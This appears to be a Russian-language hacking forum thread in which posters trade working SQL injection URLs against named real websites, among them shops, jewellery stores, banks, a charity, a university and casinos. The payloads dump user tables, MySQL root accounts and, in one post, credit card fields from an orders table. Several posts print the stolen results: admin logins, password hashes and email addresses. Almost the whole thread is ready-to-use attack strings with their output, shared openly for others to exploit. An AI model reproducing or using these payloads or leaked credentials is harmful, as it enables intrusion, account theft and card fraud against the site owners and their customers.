SQL Инъекции

Четвёртая ветка, шоп.

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,id,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*&cat_id=46&sub_id=312

1::flash62::wes::[email protected]

Логинимся тут вроде
http://www.worldfolkart.org/cart_account.php

Картон )))

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,cc_num,cc_name,cc_type),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+orders/*&cat_id=46&sub_id=312

по count 4787 штук в базе, without cvv. Можете дампить, я плохими делами не занимаюсь.
Удачи )))

 

Инъекция:

Инфо:

Структура:

Code:

categories:
   u_id
   cat_id
   cat_name
   cat_parent
   cat_descr

comm_members_list:
   comm_id
   u_id
   u_status
   comm_name

comments:
   comm_id
   comm_parent_id
   comm_parent_type
   comm_date
   comm_header
   comm_content
   comm_autor

Инъекция:

Инфо:

Структуру лень раскрывать было...




Инъекция:

Инфо:

 

Code:

[U][B]http://[COLOR=White]www.s7tour.ru[/COLOR]/hotel.php?country=-1+union+select+1,version()/*[/B][/U]

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*

 

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass)+FROM+poll_user/*

 

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,password,email),3,4,5,6,7,8,9,10+from+users--

 

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations

 

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.

 

Инъекция:

Code:

DB Version - [B]5.0.51a-log[/B]
DB User    - [B]charity_charity@localhost[/B]
DB Name    - [B]charity_charity[/B]

Таблицы:

Таблица beg_users:

Таблица beg_manager:

Таблица beg_unwelcome:

Только что-то пароли не подходят

Email:

Пароль:

 

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password)+from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent

 

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

 

Красивый сайт нет слов ))

http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat_ws(0x3a,table_schema,table_name),3,4+from+information_schema.tables+limit+351,1--


http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat(user_login,0x3a,user_pass,char(32,32),user_nicename,char(32,32),user_email),3,4+from+asandcom_wordpress.wp_users+limit+1,1--

admin:$P$BkKicvsTytFhHOXTNGhYXCg25CvccO. admin [email protected]

zg:$P$BuYAHnmiu7Hx2ULVXEx1mMR8IyaSav/ zg [email protected]

 

банк..

компания.. пасс:a3xx-100

муз школа..

 

Ещё один банк.

http://www.vrlknowledgebank.com/reportinfo.php?id=-66+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3A3a,user,password)+using+latin1),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*&page=3

root::297735bc666480a3::20To10

 

http://www.hoys.co.uk/shopping/exhibitor-view.php?id=-204+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--

Продолжаем тему шоппинга в сети =)

5.0.51a

 

регионалки...пр5 и пр3

Database name: cms_uvirtual
Version: 4.0.21
User name: [email protected]

Database name: corporin_acg
Version: 4.1.22-standard
User name: corporin_impacto@localhost

 

1 edu, лень найденные на компе искать... на днях поболее выложу

Code:

http://soa.syr.edu/index.php?id=-4512+union+select+1,2,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),4,5,6,7,8,9,10,11,12,13+from+mysql.user+limit+0,1--

root:*430A4383A430D0DB40E90432B769B148BB9765D2:localhost:Y

 

http://top.yason.com.ua

Code:

http://top.yason.com.ua/kom.php?id=1+union+select+1,concat(login,0x3a,password),3,4,5,6+from+yasonua_top.users--

 

Code:

http://www.orby.es/index.php?id=-33+union+select+1,2,3,version(),5,6,7/*
http://www.plataformarefineriano.es/index.php?id=-466+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://www.bomberosdeasturias.es/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/*
http://extremadura.cnt.es/index.php?id=-1517+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.fedemotocyl.es/index.php?id=-154+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
http://www.casino-online-fr.com/es/id.php?ID=-1398+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.7casinoonline.com/it/es/id.php?ID=-1405+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.grandscasinos.com/es/id.php?ID=-1513+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.casino-fr-bonus.com/es/id.php?ID=-1414+union+select+1,2,version(),4,5,6,7,8,9,10,11/*

Code:

http://www.hamo.es/cat/news.php?id=-10+union+select+1,2,3,4,concat(login,char(58),password),6,7,8,9+from+usuarios/*

hamo:se73rXKXniZMM
Админки не нашёл

 

ws_users

user_login
user_pass

 

Hero1n
Там пятая версия,и таблицы подбирать не надо =) Кому надо,тот сдампит.